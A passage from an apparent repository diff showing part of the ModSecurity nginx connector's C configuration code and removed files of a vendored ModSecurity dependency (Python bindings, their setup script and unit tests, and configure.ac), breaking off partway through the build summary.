if (res < 0) {
dd("Failed to load the rules from: '%s' - reason: '%s'", rules_set, error);
return strdup(error);
}
mmcf = ngx_http_conf_get_module_main_conf(cf, ngx_http_modsecurity_module);
mmcf->rules_file += res;
return NGX_CONF_OK;
}
char *
ngx_conf_set_rules_remote(ngx_conf_t *cf, ngx_command_t *cmd, void *conf)
{
int res;
ngx_str_t *value;
const char *error;
const char *rules_remote_key, *rules_remote_server;
ngx_pool_t *old_pool;
ngx_http_modsecurity_conf_t *mcf = conf;
ngx_http_modsecurity_main_conf_t *mmcf;
value = cf->args->elts;
rules_remote_key = ngx_str_to_char(value[1], cf->pool);
rules_remote_server = ngx_str_to_char(value[2], cf->pool);
if (rules_remote_server == (char *)-1) {
return NGX_CONF_ERROR;
}
if (rules_remote_key == (char *)-1) {
return NGX_CONF_ERROR;
}
old_pool = ngx_http_modsecurity_pcre_malloc_init(cf->pool);
res = msc_rules_add_remote(mcf->rules_set, rules_remote_key, rules_remote_server, &error);
ngx_http_modsecurity_pcre_malloc_done(old_pool);
if (res < 0) {
dd("Failed to load the rules from: '%s' - reason: '%s'", rules_remote_server, error);
return strdup(error);
}
mmcf = ngx_http_conf_get_module_main_conf(cf, ngx_http_modsecurity_module);
mmcf->rules_remote += res;
return NGX_CONF_OK;
}
char *ngx_conf_set_transaction_id(ngx_conf_t *cf, ngx_command_t *cmd, void *conf) {
ngx_str_t *value;
ngx_http_complex_value_t cv;
ngx_http_compile_complex_value_t ccv;
ngx_http_modsecurity_conf_t *mcf = conf;
value = cf->args->elts;
ngx_memzero(&ccv, sizeof(ngx_http_compile_complex_value_t));
ccv.cf = cf;
ccv.value = &value[1];
ccv.complex_value = &cv;
ccv.zero = 1;
if (ngx_http_compile_complex_value(&ccv) != NGX_OK) {
return NGX_CONF_ERROR;
}
mcf->transaction_id = ngx_palloc(cf->pool, sizeof(ngx_http_complex_value_t));
if (mcf->transaction_id == NULL) {
return NGX_CONF_ERROR;
}
*mcf->transaction_id = cv;
return NGX_CONF_OK;
}
static ngx_command_t ngx_http_modsecurity_commands[] = {
{
ngx_string("modsecurity"),
NGX_HTTP_LOC_CONF|NGX_HTTP_SRV_CONF|NGX_HTTP_MAIN_CONF|NGX_CONF_FLAG,
ngx_conf_set_flag_slot,
NGX_HTTP_LOC_CONF_OFFSET,
offsetof(ngx_http_modsecurity_conf_t, enable),
NULL
},
{
ngx_string("modsecurity_rules"),
NGX_HTTP_LOC_CONF|NGX_HTTP_SRV_CONF|NGX_HTTP_MAIN_CONF|NGX_CONF_TAKE1,
ngx_conf_set_rules,
NGX_HTTP_LOC_CONF_OFFSET,
offsetof(ngx_http_modsecurity_conf_t, enable),
NULL
},
{
ngx_string("modsecurity_rules_file"),
NGX_HTTP_LOC_CONF|NGX_HTTP_SRV_CONF|NGX_HTTP_MAIN_CONF|NGX_CONF_TAKE1,
ngx_conf_set_rules_file,
NGX_HTTP_LOC_CONF_OFFSET,
offsetof(ngx_http_modsecurity_conf_t, enable),
NULL
},
{
ngx_string("modsecurity_rules_remote"),
NGX_HTTP_LOC_CONF|NGX_HTTP_SRV_CONF|NGX_HTTP_MAIN_CONF|NGX_CONF_TAKE2,
ngx_conf_set_rules_remote,
NGX_HTTP_LOC_CONF_OFFSET,
offsetof(ngx_http_modsecurity_conf_t, enable),
NULL
},
{
ngx_string("modsecurity_transaction_id"),
NGX_HTTP_LOC_CONF|NGX_HTTP_SRV_CONF|NGX_HTTP_MAIN_CONF|NGX_CONF_1MORE,
ngx_conf_set_transaction_id,
NGX_HTTP_LOC_CONF_OFFSET,
0,
NULL
},
ngx_null_command
};
static ngx_http_module_t ngx_http_modsecurity_ctx = {
NULL, /* preconfiguration */
ngx_http_modsecurity_init, /* postconfiguration */
ngx_http_modsecurity_create_main_conf, /* create main configuration */
ngx_http_modsecurity_init_main_conf, /* init main configuration */
NULL, /* create server configuration */
NULL, /* merge server configuration */
ngx_http_modsecurity_create_conf, /* create location configuration */
ngx_http_modsecurity_merge_conf /* merge location configuration */
};
ngx_module_t ngx_http_modsecurity_module = {
NGX_MODULE_V1,
&ngx_http_modsecurity_ctx, /* module context */
ngx_http_modsecurity_commands, /* module directives */
NGX_HTTP_MODULE, /* module type */
NULL, /* init master */
NULL, /* init module */
NULL, /* init process */
NULL, /* init thread */
NULL, /* exit thread */
NULL, /* exit process */
NULL, /* exit master */
NGX_MODULE_V1_PADDING
};
static ngx_int_t
ngx_http_modsecurity_init(ngx_conf_t *cf)
{
ngx_http_handler_pt *h_rewrite;
ngx_http_handler_pt *h_access;
ngx_http_handler_pt *h_log;
ngx_http_core_main_conf_t *cmcf;
int rc = 0;
cmcf = ngx_http_conf_get_module_main_conf(cf, ngx_http_core_module);
if (cmcf == NULL)
{
dd("We are not sure how this returns, NGINX doesn't seem to think it will ever be null");
return NGX_ERROR;
}
/**
*
* Seems like we cannot do this very same thing with
* NGX_HTTP_FIND_CONFIG_PHASE. it does not seems to
* be an array. Our next option is the REWRITE.
*
* TODO: check if we can hook prior to NGX_HTTP_REWRITE_PHASE phase.
*
*/
h_rewrite = ngx_array_push(&cmcf->phases[NGX_HTTP_REWRITE_PHASE].handlers);
if (h_rewrite == NULL)
{
dd("Not able to create a new NGX_HTTP_REWRITE_PHASE handle");
return NGX_ERROR;
}
*h_rewrite = ngx_http_modsecurity_rewrite_handler;
/**
*
* Processing the request body on the access phase.
*
* TODO: check if hook into separated phases is the best thing to do.
*
*/
h_access = ngx_array_push(&cmcf->phases[NGX_HTTP_ACCESS_PHASE].handlers);
if (h_access == NULL)
{
dd("Not able to create a new NGX_HTTP_ACCESS_PHASE handle");
return NGX_ERROR;
}
*h_access = ngx_http_modsecurity_access_handler;
/**
* Process the log phase.
*
* TODO: check if the log phase happens like it happens on Apache.
* check if last phase will not hold the request.
*
*/
h_log = ngx_array_push(&cmcf->phases[NGX_HTTP_LOG_PHASE].handlers);
if (h_log == NULL)
{
dd("Not able to create a new NGX_HTTP_LOG_PHASE handle");
return NGX_ERROR;
}
*h_log = ngx_http_modsecurity_log_handler;
rc = ngx_http_modsecurity_header_filter_init();
if (rc != NGX_OK) {
return rc;
}
rc = ngx_http_modsecurity_body_filter_init();
if (rc != NGX_OK) {
return rc;
}
return NGX_OK;
}
static void *
ngx_http_modsecurity_create_main_conf(ngx_conf_t *cf)
{
ngx_pool_cleanup_t *cln;
ngx_http_modsecurity_main_conf_t *conf;
conf = (ngx_http_modsecurity_main_conf_t *) ngx_pcalloc(cf->pool,
sizeof(ngx_http_modsecurity_main_conf_t));
if (conf == NULL)
{
return NGX_CONF_ERROR;
}
/*
* set by ngx_pcalloc():
*
* conf->modsec = NULL;
* conf->pool = NULL;
* conf->rules_inline = 0;
* conf->rules_file = 0;
* conf->rules_remote = 0;
*/
cln = ngx_pool_cleanup_add(cf->pool, 0);
if (cln == NULL) {
return NGX_CONF_ERROR;
}
cln->handler = ngx_http_modsecurity_cleanup_instance;
cln->data = conf;
conf->pool = cf->pool;
/* Create our ModSecurity instance */
conf->modsec = msc_init();
if (conf->modsec == NULL)
{
dd("failed to create the ModSecurity instance");
return NGX_CONF_ERROR;
}
/* Provide our connector information to LibModSecurity */
msc_set_connector_info(conf->modsec, MODSECURITY_NGINX_WHOAMI);
msc_set_log_cb(conf->modsec, ngx_http_modsecurity_log);
dd ("main conf created at: '%p', instance is: '%p'", conf, conf->modsec);
return conf;
}
static char *
ngx_http_modsecurity_init_main_conf(ngx_conf_t *cf, void *conf)
{
ngx_http_modsecurity_main_conf_t *mmcf;
mmcf = (ngx_http_modsecurity_main_conf_t *) conf;
ngx_log_error(NGX_LOG_NOTICE, cf->log, 0,
"%s (rules loaded inline/local/remote: %ui/%ui/%ui)",
MODSECURITY_NGINX_WHOAMI, mmcf->rules_inline,
mmcf->rules_file, mmcf->rules_remote);
return NGX_CONF_OK;
}
static void *
ngx_http_modsecurity_create_conf(ngx_conf_t *cf)
{
ngx_pool_cleanup_t *cln;
ngx_http_modsecurity_conf_t *conf;
conf = (ngx_http_modsecurity_conf_t *) ngx_pcalloc(cf->pool,
sizeof(ngx_http_modsecurity_conf_t));
if (conf == NULL)
{
dd("Failed to allocate space for ModSecurity configuration");
return NGX_CONF_ERROR;
}
/*
* set by ngx_pcalloc():
*
* conf->enable = 0;
* conf->sanity_checks_enabled = 0;
* conf->rules_set = NULL;
* conf->pool = NULL;
* conf->transaction_id = NULL;
*/
conf->enable = NGX_CONF_UNSET;
conf->rules_set = msc_create_rules_set();
conf->pool = cf->pool;
conf->transaction_id = NGX_CONF_UNSET_PTR;
#if defined(MODSECURITY_SANITY_CHECKS) && (MODSECURITY_SANITY_CHECKS)
conf->sanity_checks_enabled = NGX_CONF_UNSET;
#endif
cln = ngx_pool_cleanup_add(cf->pool, 0);
if (cln == NULL) {
dd("failed to create the ModSecurity configuration cleanup");
return NGX_CONF_ERROR;
}
cln->handler = ngx_http_modsecurity_cleanup_rules;
cln->data = conf;
dd ("conf created at: '%p'", conf);
return conf;
}
static char *
ngx_http_modsecurity_merge_conf(ngx_conf_t *cf, void *parent, void *child)
{
ngx_http_modsecurity_conf_t *p = parent;
ngx_http_modsecurity_conf_t *c = child;
#if defined(MODSECURITY_DDEBUG) && (MODSECURITY_DDEBUG)
ngx_http_core_loc_conf_t *clcf = ngx_http_conf_get_module_loc_conf(cf, ngx_http_core_module);
#endif
int rules;
const char *error = NULL;
dd("merging loc config [%s] - parent: '%p' child: '%p'",
ngx_str_to_char(clcf->name, cf->pool), parent,
child);
dd(" state - parent: '%d' child: '%d'",
(int) c->enable, (int) p->enable);
ngx_conf_merge_value(c->enable, p->enable, 0);
ngx_conf_merge_ptr_value(c->transaction_id, p->transaction_id, NULL);
#if defined(MODSECURITY_SANITY_CHECKS) && (MODSECURITY_SANITY_CHECKS)
ngx_conf_merge_value(c->sanity_checks_enabled, p->sanity_checks_enabled, 0);
#endif
#if defined(MODSECURITY_DDEBUG) && (MODSECURITY_DDEBUG)
dd("PARENT RULES");
msc_rules_dump(p->rules_set);
dd("CHILD RULES");
msc_rules_dump(c->rules_set);
#endif
rules = msc_rules_merge(c->rules_set, p->rules_set, &error);
if (rules < 0) {
return strdup(error);
}
#if defined(MODSECURITY_DDEBUG) && (MODSECURITY_DDEBUG)
dd("NEW CHILD RULES");
msc_rules_dump(c->rules_set);
#endif
return NGX_CONF_OK;
}
static void
ngx_http_modsecurity_cleanup_instance(void *data)
{
ngx_pool_t *old_pool;
ngx_http_modsecurity_main_conf_t *mmcf;
mmcf = (ngx_http_modsecurity_main_conf_t *) data;
dd("deleting a main conf -- instance is: \"%p\"", mmcf->modsec);
old_pool = ngx_http_modsecurity_pcre_malloc_init(mmcf->pool);
msc_cleanup(mmcf->modsec);
ngx_http_modsecurity_pcre_malloc_done(old_pool);
}
static void
ngx_http_modsecurity_cleanup_rules(void *data)
{
ngx_pool_t *old_pool;
ngx_http_modsecurity_conf_t *mcf;
mcf = (ngx_http_modsecurity_conf_t *) data;
dd("deleting a loc conf -- RuleSet is: \"%p\"", mcf->rules_set);
old_pool = ngx_http_modsecurity_pcre_malloc_init(mcf->pool);
msc_rules_cleanup(mcf->rules_set);
ngx_http_modsecurity_pcre_malloc_done(old_pool);
}
/* vi:set ft=c ts=4 sw=4 et fdm=marker: */

10
src/deps/src/ModSecurity/bindings/python/README.md
View File

@ -1,10 +0,0 @@
# Introduction
The following are a set of Swig generated Python bindings for libmodsecurity. These bindings will allow users to utilize the exposed libmodsecurity interfaces directly from python, without the use of ctypes.
# Compilation
Although these are python scripts DO NOT use setup.py to compile this. Instead, one should use the Makefile in order to compile these. This can be done by typing 'make'. Be aware that the Python development headers are required to build this package. These can be obtained on RHEL via 'dnf install python-devel'

1
src/deps/src/ModSecurity/bindings/python/modsecurity/__init__.py
View File

@ -1 +0,0 @@
from modsecurity import *

63
src/deps/src/ModSecurity/bindings/python/modsecurity/modsecurity.i
View File

@ -1,63 +0,0 @@
/*
* ModSecurity, http://www.modsecurity.org/
* Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/)
*
* You may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* If any of the files related to licensing are missing or if you have any
* other questions related to licensing please contact Trustwave Holdings, Inc.
* directly using the email address security@modsecurity.org.
*
* Author: Felipe "Zimmerle" Costa <fcosta at trustwave dot com>
*
*/
%module modsecurity
%include "std_string.i"
%include "std_vector.i"
%include "std_sstream.i"
%include "attribute.i"
%include "carrays.i"
%include "typemaps.i"
#%ignore RulesProperties::parserError;
%{
#include "modsecurity/intervention.h"
#include "modsecurity/transaction/variable.h"
#include "modsecurity/transaction/variables.h"
#include "modsecurity/transaction/collection.h"
#include "modsecurity/transaction/collections.h"
#include "modsecurity/transaction.h"
#include "modsecurity/debug_log.h"
#include "modsecurity/modsecurity.h"
#include "modsecurity/rules_properties.h"
#include "modsecurity/rules.h"
#include "modsecurity/rule.h"
using std::basic_string;
%}
%ignore modsecurity::RulesProperties::parserError const;
%include "modsecurity/intervention.h"
%include "modsecurity/transaction/variable.h"
%include "modsecurity/transaction/variables.h"
%include "modsecurity/transaction/collection.h"
%include "modsecurity/transaction/collections.h"
%include "modsecurity/transaction.h"
%include "modsecurity/debug_log.h"
%include "modsecurity/modsecurity.h"
%include "modsecurity/rules_properties.h"
%include "modsecurity/rules.h"
%include "modsecurity/rule.h"
%template(RuleVector) std::vector<modsecurity::Rule *>;
%template(VectorOfRuleVector) std::vector<std::vector<modsecurity::Rule *> >;
%template(StringVector) std::vector<std::string>;

107
src/deps/src/ModSecurity/bindings/python/setup.py
View File

@ -1,107 +0,0 @@
#!/usr/bin/env python
"""
ModSecurity, http://www.modsecurity.org/
Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/)
You may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
If any of the files related to licensing are missing or if you have any
other questions related to licensing please contact Trustwave Holdings, Inc.
directly using the email address security@modsecurity.org.
Author: Felipe "Zimmerle" Costa <fcosta at trustwave dot com>
"""
from distutils.core import setup, Extension
import os
import sys
possible_modsecurity_dirs = [
"/usr/local/modsecurity/",
"/usr/",
"/usr/local/"
]
libraries_dir = [
"lib/",
"lib64/"
]
headers_dir = [
"include/",
"headers/",
"./"
]
def find_modsec():
for i in possible_modsecurity_dirs:
lib = None
inc = None
for j in libraries_dir:
p = os.path.join(i, j, "libmodsecurity.so")
if os.path.isfile(p) or os.path.islink(p):
lib = os.path.join(i, j)
for x in headers_dir:
p = os.path.join(i, x, os.path.join("modsecurity", "modsecurity.h"))
if os.path.isfile(p) or os.path.islink(p):
inc = os.path.join(i, x)
if inc != None and lib != None:
return (inc, lib)
return (None, None)
inc_dir, lib_dir = find_modsec()
print "*** found modsecurity at:"
print " headers: " + str(inc_dir)
print " library: " + str(lib_dir)
if inc_dir == None or lib_dir == None:
print "libModSecurity was not found in your system."
print "Make sure you have libModSecurity correctly installed in your system."
sys.exit(1)
#if os.path.isfile("modsecurity/_modsecurity_module.cc") == False:
# print "Swig generated code was not found. Please run `make' first"
# sys.exit(1)
extension_mod = Extension(
"_modsecurity", [
"modsecurity/modsecurity_wrap.cxx"
],
libraries=["modsecurity"],
swig_opts=['-Wextra', '-builtin'],
library_dirs=[lib_dir],
runtime_library_dirs=[lib_dir],
include_dirs=[inc_dir, "."],
extra_compile_args=["-std=c++11"]
)
setup(
name = "modsecurity",
description = 'Python Bindings for libModSecurity',
author = 'Felipe Zimmerle',
author_email = 'felipe@zimmerle.org',
url = 'https://github.com/SpiderLabs/ModSecurity-Python-bindings',
ext_modules = [extension_mod],
packages = ['modsecurity'],
classifiers = [
'Topic :: Security',
'Topic :: Internet :: WWW/HTTP'
]
)

54
src/deps/src/ModSecurity/bindings/python/tests/t.py
View File

@ -1,54 +0,0 @@
#!/usr/bin/env python
"""
ModSecurity, http://www.modsecurity.org/
Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/)
You may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
If any of the files related to licensing are missing or if you have any
other questions related to licensing please contact Trustwave Holdings, Inc.
directly using the email address security@modsecurity.org.
Author: Felipe "Zimmerle" Costa <fcosta at trustwave dot com>
"""
import sys
import unittest
sys.path.append("..")
sys.path.append(".")
import modsecurity
class TestStringMethods(unittest.TestCase):
def test_version(self):
self.assertRegexpMatches(str(modsecurity.ModSecurity().whoAmI()), ".*ModSecurity.*")
def test_load_rules(self):
rules = modsecurity.Rules()
ret = rules.load('SecRule ARGS_POST|XML:/* "(\n|\r)" "id:1,deny,phase:2"')
self.assertEqual(ret, 1)
ret = rules.load("""
SecRule ARGS_POST|XML:/* "(\n|\r)" "id:1,deny,phase:2"
SecRule ARGS_POST|XML:/* "(\n|\r)" "id:2,deny,phase:2"
""")
self.assertEqual(ret, 2)
ret = rules.getRulesForPhase(3)
self.assertEqual(ret.size(), 3)
def test_load_bad_rules(self):
rules = modsecurity.Rules()
ret = rules.load('SecRule ARGS_POST|XML:/* "(\n|\r)" "deny,phase:2"')
self.assertEqual(ret, -1)
ret = rules.getParserError()
self.assertRegexpMatches(ret, "Rules must have an ID.*")
if __name__ == '__main__':
unittest.main()

639
src/deps/src/ModSecurity/configure.ac
View File

@ -1,639 +0,0 @@
# ModSecurity configure.ac
# Get the hash of the last commit, to be used if it is not an
# official release.
AC_DEFUN([MSC_GIT_HASH], m4_esyscmd_s(git log -1 --format="%h" --abbrev-commit))
AC_DEFUN([MSC_MAJOR], m4_esyscmd_s(cat headers/modsecurity/modsecurity.h | grep "define MODSECURITY_MAJOR " | awk {'print $3'} | sed 's/\"//g'))
AC_DEFUN([MSC_MINOR], m4_esyscmd_s(cat headers/modsecurity/modsecurity.h | grep "define MODSECURITY_MINOR " | awk {'print $3'} | sed 's/\"//g'))
AC_DEFUN([MSC_PATCHLEVEL], m4_esyscmd_s(cat headers/modsecurity/modsecurity.h | grep "define MODSECURITY_PATCHLEVEL " | awk {'print $3'} | sed 's/\"//g'))
AC_DEFUN([MSC_TAG], m4_esyscmd_s(cat headers/modsecurity/modsecurity.h | grep "define MODSECURITY_FTAG " | awk {'print $3'} | sed 's/\"//g'))
# Version definition to be further used by AC_INIT and
# .so file naming.
m4_define([msc_version_major], [MSC_MAJOR])
m4_define([msc_version_minor], [MSC_MINOR])
m4_define([msc_version_patchlevel], [MSC_PATCHLEVEL])
m4_define([msc_version_c_plus_a], [m4_eval(msc_version_major + msc_version_minor)])
m4_define([msc_version],
[msc_version_major.msc_version_minor])
m4_define([msc_version_with_patchlevel],
[msc_version_major.msc_version_minor.msc_version_patchlevel])
m4_define([msc_version_git],
[m4_esyscmd_s(git describe)])
m4_define([msc_version_info],
[msc_version_c_plus_a:msc_version_patchlevel:msc_version_minor])
# Project Information
AC_INIT([modsecurity], [3.0], [security@modsecurity.org])
# General definitions
AC_CONFIG_MACRO_DIR([build])
AC_PREFIX_DEFAULT([/usr/local/modsecurity])
# General automake options.
AM_INIT_AUTOMAKE([-Wall -Werror foreign subdir-objects])
# Check for dependencies (C++, AR, Lex, Yacc and Make)
AC_PROG_CXX
AM_PROG_AR
AC_PROG_MAKE_SET
PKG_PROG_PKG_CONFIG
# Check if the compiler is c++11 compatible.
# AX_CXX_COMPILE_STDCXX_11(,mandatory)
# Check for libinjection
if ! test -f "${srcdir}/others/libinjection/src/libinjection_html5.c"; then
AC_MSG_ERROR([\
libInjection was not found within ModSecurity source directory.
libInjection code is available as part of ModSecurity source code in a format
of a git-submodule. git-submodule allow us to specify the correct version of
libInjection and still uses the libInjection repository to download it.
You can download libInjection using git:
$ git submodule init
$ git submodule update
])
fi
# Libinjection version
AC_DEFUN([LIBINJECTION_VERSION], m4_esyscmd_s(cd "others/libinjection" && git describe && cd ../..))
# SecLang test version
AC_DEFUN([SECLANG_TEST_VERSION], m4_esyscmd_s(cd "test/test-cases/secrules-language-tests" && git log -1 --format="%h" --abbrev-commit && cd ../../..))
# Check for yajl
PROG_YAJL
AM_CONDITIONAL([YAJL_VERSION], [test "$YAJL_VERSION" != ""])
# Check for LibGeoIP
PROG_GEOIP
AM_CONDITIONAL([GEOIP_CFLAGS], [test "GEOIP_CFLAGS" != ""])
# Check for MaxMind
PROG_MAXMIND
AM_CONDITIONAL([MAXMIND_CFLAGS], [test "MAXMIND_CFLAGS" != ""])
# Check for LMDB
PROG_LMDB
AM_CONDITIONAL([LMDB_CFLAGS], [test "LMDB_CFLAGS" != ""])
# Check for SSDEEP
CHECK_SSDEEP
AM_CONDITIONAL([SSDEEP_CFLAGS], [test "SSDEEP_CFLAGS" != ""])
# Check for LUA
CHECK_LUA
AM_CONDITIONAL([LUA_CFLAGS], [test "LUA_CFLAGS" != ""])
#
# Check for curl
#
CHECK_CURL
if ! test -z "${CURL_VERSION}"; then
AC_DEFINE([MSC_WITH_CURL], [1], [Define if libcurl is available])
fi
#
# Check for LibXML
#
CHECK_LIBXML2
#
# Check for libpcre
#
CHECK_PCRE
#
# Check for pcre2
#
PROG_PCRE2
AM_CONDITIONAL([PCRE2_CFLAGS], [test "PCRE2_CFLAGS" != ""])
# Checks for header files.
AC_HEADER_STDC
AC_CHECK_HEADERS([string])
AC_CHECK_HEADERS([iostream])
AC_CHECK_HEADERS([sys/utsname.h])
# ??
LT_INIT([dlopen])
# Identify platform
AC_CANONICAL_HOST
case $host in
*-*-aix*)
echo "Checking platform... Identified as AIX"
AC_DEFINE([AIX], [1], [Define if the operating system is AIX])
PLATFORM="AIX"
;;
*-*-hpux*)
echo "Checking platform... Identified as HPUX"
AC_DEFINE([HPUX], [1], [Define if the operating system is HPUX])
PLATFORM="HPUX"
;;
*-*-darwin*)
echo "Checking platform... Identified as Macintosh OS X"
AC_DEFINE([MACOSX], [1], [Define if the operating system is Macintosh OSX])
PLATFORM="MacOSX"
;;
*-*-linux* | *-*uclinux*)
echo "Checking platform... Identified as Linux"
AC_DEFINE([LINUX], [1], [Define if the operating system is LINUX])
PLATFORM="Linux"
;;
*-*-solaris*)
echo "Checking platform... Identified as Solaris"
AC_DEFINE([SOLARIS], [1], [Define if the operating system is SOLARIS])
PLATFORM="Solaris"
;;
*-*-freebsd*)
echo "Checking platform... Identified as FreeBSD"
AC_DEFINE([FREEBSD], [1], [Define if the operating system is FREEBSD])
PLATFORM="FreeBSD"
;;
*-*-netbsd*)
echo "Checking platform... Identified as NetBSD"
AC_DEFINE([NETBSD], [1], [Define if the operating system is NETBSD])
PLATFORM="NetBSD"
;;
*-*-openbsd*)
echo "Checking platform... Identified as OpenBSD"
AC_DEFINE([OPENBSD], [1], [Define if the operating system is OPENBSD])
PLATFORM="OpenBSD"
;;
*-*-kfreebsd*)
echo "Checking platform... Identified as kFreeBSD, treating as linux"
AC_DEFINE([FREEBSD], [1], [Define if the operating system is FREEBSD])
PLATFORM="kFreeBSD"
;;
*-*-dragonfly*)
echo "Checking platform... Identified as DragonFlyBSD, treating as linux"
AC_DEFINE([DRAGONFLY], [1], [Define if the operating system is DRAGONFLY])
PLATFORM="DragonFly"
;;
*-*-gnu*.*)
echo "Checking platform... Identified as HURD, treating as linux"
AC_DEFINE([LINUX], [1], [Define if the operating system is LINUX])
PLATFORM="HURD"
;;
*)
echo "Unknown CANONICAL_HOST $host"
exit 1
;;
esac
# Variables to be used inside the Makefile.am files.
MSC_BASE_DIR=`pwd`
AC_SUBST([MSC_BASE_DIR])
MSC_VERSION_INFO=msc_version_info
AC_SUBST([MSC_VERSION_INFO])
MSC_VERSION_WITH_PATCHLEVEL=msc_version_with_patchlevel
AC_SUBST([MSC_VERSION_WITH_PATCHLEVEL])
MSC_VERSION=msc_version
AC_SUBST([MSC_VERSION])
MSC_GIT_VERSION=msc_version_git
AC_SUBST([MSC_GIT_VERSION])
AC_ARG_ENABLE(debug-logs,
[AS_HELP_STRING([--disable-debug-logs],[Turn off the SecDebugLog feature])],
[case "${enableval}" in
yes) debugLogs=true ;;
no) debugLogs=false ;;
*) AC_MSG_ERROR(bad value ${enableval} for --enable-debug-logs) ;;
esac],
[debugLogs=true]
)
if test "$debugLogs" != "true"; then
MODSEC_NO_LOGS="-DNO_LOGS=1"
AC_SUBST(MODSEC_NO_LOGS)
fi
# Fuzzer
AC_ARG_ENABLE(afl-fuzz,
[AS_HELP_STRING([--enable-afl-fuzz],[Turn on the afl fuzzer compilation utilities])],
[case "${enableval}" in
yes) aflFuzzer=true ;;
no) aflFuzzer=false ;;
*) AC_MSG_ERROR(bad value ${enableval} for --enable-afl-fuzz) ;;
esac],
[aflFuzzer=false]
)
# Examples
AC_ARG_ENABLE(examples,
[AS_HELP_STRING([--enable-examples],[Turn on the examples compilation (default option)])],
[case "${enableval}" in
yes) buildExamples=true ;;
no) buildExamples=false ;;
*) AC_MSG_ERROR(bad value ${enableval} for --enable-examples) ;;
esac],
[buildExamples=true]
)
# Parser
AC_ARG_ENABLE(parser-generation,
[AS_HELP_STRING([--enable-parser-generation],[Enables parser generation during the build])],
[case "${enableval}" in
yes) buildParser=true ;;
no) buildParser=false ;;
*) AC_MSG_ERROR(bad value ${enableval} for --enable-parser-generation) ;;
esac],
[buildParser=false]
)
# Mutex
AC_ARG_ENABLE(mutex-on-pm,
[AS_HELP_STRING([--enable-mutex-on-pm],[Treats pm operations as a critical section])],
[case "${enableval}" in
yes) mutexPm=true ;;
no) mutexPm=false ;;
*) AC_MSG_ERROR(bad value ${enableval} for --enable-mutex-on-pm) ;;
esac],
[mutexPm=false]
)
if test "$mutexPm" == "true"; then
MODSEC_MUTEX_ON_PM="-DMUTEX_ON_PM=1"
AC_SUBST(MODSEC_MUTEX_ON_PM)
fi
if test $buildParser = true; then
AC_PROG_YACC
AC_PROG_LEX
AC_PATH_PROG([FLEX], [flex])
test "x$FLEX" = "x" && AC_MSG_ERROR([flex is needed to build ModSecurity])
AC_PATH_PROG([BISON], [bison])
test "x$BISON" = "x" && AC_MSG_ERROR([bison is needed to build ModSecurity])
AC_PATH_PROG([YACC_INST], $YACC)
if test ! -f "$srcdir/gram.c"; then
if test -z "$YACC_INST"; then
AC_MSG_ERROR([yacc not found - unable to compile ModSecurity])
fi
fi
fi
# Decide if we want to build the tests or not.
# buildTestUtilities=false
# if test "x$YAJL_FOUND" = "x1"; then
# Regression tests will not be able to run without the logging support.
# But we still have the unit tests.
# if test "$debugLogs" = "true"; then
# buildTestUtilities=true
# fi
# fi
AM_CONDITIONAL([TEST_UTILITIES], [test $buildTestUtilities = true])
if test $buildTestUtilities = true; then
if test $debugLogs = true; then
if test -f ./test/test-list.sh; then
TEST_CASES=`./test/test-list.sh`
fi
fi
fi
AM_CONDITIONAL([EXAMPLES], [test $buildExamples = true])
AM_CONDITIONAL([BUILD_PARSER], [test $buildParser = true])
AM_CONDITIONAL([USE_MUTEX_ON_PM], [test $mutexPm = true])
# General link options
if test "$PLATFORM" != "MacOSX" -a "$PLATFORM" != "OpenBSD"; then
GLOBAL_LDADD="-lrt "
fi
if test "$aflFuzzer" == "true"; then
FUZZ_CPPCFLAGS="-fsanitize=address -fsanitize-coverage=4 "
GLOBAL_LDADD="$GLOBAL_LDADD -fsanitize=address "
GLOBAL_CPPFLAGS="$GLOBAL_CPPFLAGS $FUZZ_CPPCFLAGS"
$buildExamples = false
fi
AC_SUBST(GLOBAL_LDADD)
AC_SUBST(GLOBAL_CPPFLAGS)
AM_CONDITIONAL([AFL_FUZZER], [test $aflFuzzer = true])
GLOBAL_CFLAGS=""
AC_SUBST(GLOBAL_CFLAGS)
# Files to be generated via autotools.
AC_CONFIG_FILES([\
modsecurity.pc \
Makefile \
doc/Makefile \
src/Makefile \
others/Makefile \
tools/Makefile \
tools/rules-check/Makefile
])
AM_COND_IF([TEST_UTILITIES],
[AC_CONFIG_FILES([test/Makefile test/benchmark/Makefile])])
AM_COND_IF([EXAMPLES],
[AC_CONFIG_FILES([ \
examples/Makefile \
examples/simple_example_using_c/Makefile \
examples/multiprocess_c/Makefile \
examples/reading_logs_with_offset/Makefile \
examples/reading_logs_via_rule_message/Makefile \
examples/using_bodies_in_chunks/Makefile \
])])
AM_COND_IF([AFL_FUZZER],
[AC_CONFIG_FILES([test/fuzzer/Makefile])])
AM_COND_IF([BUILD_PARSER],
[AC_CONFIG_FILES([src/parser/Makefile])])
AC_CONFIG_HEADERS([src/config.h])
# Doxygen support
DX_HTML_FEATURE(ON)
DX_CHM_FEATURE(OFF)
DX_CHI_FEATURE(OFF)
DX_MAN_FEATURE(OFF)
DX_RTF_FEATURE(OFF)
DX_XML_FEATURE(OFF)
DX_PDF_FEATURE(OFF)
DX_PS_FEATURE(OFF)
DX_INIT_DOXYGEN([ModSecurity],[doc/doxygen.cfg])
# make check-valgrind
AX_VALGRIND_DFLT([sgcheck], [off])
AX_VALGRIND_CHECK
# Generate the files.
AC_OUTPUT
# Print a fancy summary
echo " "
echo " "
echo "ModSecurity - ${MSC_GIT_VERSION} for $PLATFORM"
echo " "
echo " Mandatory dependencies"
echo -n " + libInjection ...."
echo LIBINJECTION_VERSION
echo -n " + SecLang tests ...."
echo SECLANG_TEST_VERSION
echo " "
echo " Optional dependencies"
## GeoIP - MaxMind
if test "x$GEOIP_FOUND" = "x0" && test "x$MAXMIND_FOUND" = "x0"; then
echo " + GeoIP/MaxMind ....not found"
fi
if test "x$GEOIP_FOUND" = "x1" || test "x$MAXMIND_FOUND" = "x1"; then
echo -n " + GeoIP/MaxMind ....found "
echo ""
if test "x$MAXMIND_FOUND" = "x1"; then
echo " * (MaxMind) v${MAXMIND_VERSION}"
echo " ${MAXMIND_DISPLAY}"
fi
if test "x$GEOIP_FOUND" = "x1"; then
